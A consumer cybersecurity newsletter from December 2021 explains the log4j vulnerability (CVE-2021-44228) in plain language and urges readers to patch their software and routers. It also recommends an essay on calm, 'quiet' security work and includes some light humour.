🦊 log4j and what to do

Dec 14, 2021 6:30 pm

...people are saying this is bad and it is. Kind of like Covid (may be here to stay for a while). Below are some initial instructions to take action.


Hi. I'm Jon Fedor and this is InCyber Regular, edition 25. It's crazy to me to be at edition 25. Didn't think we would make it this far. It's been a good journey so far let's keep it up!


InCyber exists to help people secure their digital gemstones and belongings. It's about cybersecurity for the rest of us.


And we have suggestions to make your digital presence more secure than it was yesterday.


How do we measure this?

Goal One: inspire at least three people to use a password manager before the end of 2021.


Status on Goal One:

We've got two confirmed and one more tentative (needs confirmation) for starting to use a password manager! This is stretch goal progress! We're stretching like Mr. Fantastic.


Give someone the gift of security this year (or yourself) and get yourself a shiny new password manager.

image


Now on to the good stuff.


Today:

  1. log4j and what to do
  2. Doing security quietly
  3. Jason Momoa


log4j

They really do name these huge cybersecurity incidents strangely. Actually, it's really programmers who name things strangely. Here's another strange one: CVE-2021-44228.


CVE-2021-44228 is the official common vulnerabilities and exposures disclosure for the log4j vulnerability. Here's a profile of CVE-2021-44228 from NIST if you want to dive deeper.


ZDNet published a great article on log4j (updated today, 14-Dec) if you want a good sketch of the entire situation but here's some additional info.


Log4j is a legit tool used by java developers and web developers to execute event logging in their applications. It's commonly used for good: to tell log events as they happen in a program or server so that if something goes wrong, teams can go back and examine evidence.


However, we've got bad actors who've figured out how to get remote code execution (RCE) on systems by abusing a vulnerability in log4j.


And yes, there are patches for this vulnerability and an updated version release from Apache for log4j.


However, log4j is used in allllll kinds of software and SaaS tools. So many vulnerabilities remain because systems need to be scanned and patched by service providers.


This gets at why the problem is so bad:


From the ZDNet article, "As Sans Internet Storm Center notes: "There is no generic 'log4j2' patch to patch everything. In some cases, vendors including Log4j, need to patch their software to include the new version."


Log4j is like living in the desert and trying to keep sand out of your butt crack. It's just everywhere.


Microsoft's seen all kinds of exploitations of this vulnerability:


Also from the ZDNet article: "So far, Microsoft has seen attackers compromise machines to install coin miners, the Cobalt Strike pen-testing framework to enable credential theft and lateral movement, and exfiltration of data from compromised systems."


How original...bad actors gaining access and installing cryptocurrency mining infrastructure.


So, What Can We Do?

Naomi Buckwalter, a vCISO I follow, wrote a great post yesterday about this. You can read it all here.


But there are two critical things:


  1. Patch all the software and services you use. If you're getting messages saying updates are available...make the updates now. This includes hardware like NAS devices, IoT devices, and...
  2. Routers - grab the latest firmware updates for your home routers and install them. It's go time.


This family of vulnerabilities is here to stay for a while; it may be the new normal just like Covid in our personal lives. We'll have to be vigilant on this threat vector for a while.


Quiet Security

I follow a guy named Philip Winstanley. He's a CISO and security advisor.


Last week he published a thoughtful piece of writing I wanted to share.


This is how he opens, "Our profession, security, is loud and aggressive. It’s geared around combative actions. There’s an expectation that we as security professionals should be loud and aggressive too."


He goes on to make the case for doing security in a quiet, consistent, unflappable manner using some principles like:


  1. Being quick to listen and slow to speak
  2. Being proactive and thoughtfully optimizing work
  3. Being a peacemaker not a troublemaker (can be easier said than done in security)
  4. Being a bar-raiser without being a jerk (love this)


It's a good read and I recommend it.



Jason's the gift that keeps giving

The picture in the meme itself is just constantly applicable. In this case, log4j


image


Thanks!

Hanging with you is a highlight of my week!


I'm more active than ever on Twitter and ramping back up on LinkedIn too. Would love to connect with you in those places.


If you ever have questions on personal digital security, cyber security news, a story you want to tell, or a favorite resource to share (etc) reply back and let me know!


Have a good'un, Good Lookin'.


~ Jon "Not Jason Momoa" Fedor

Comments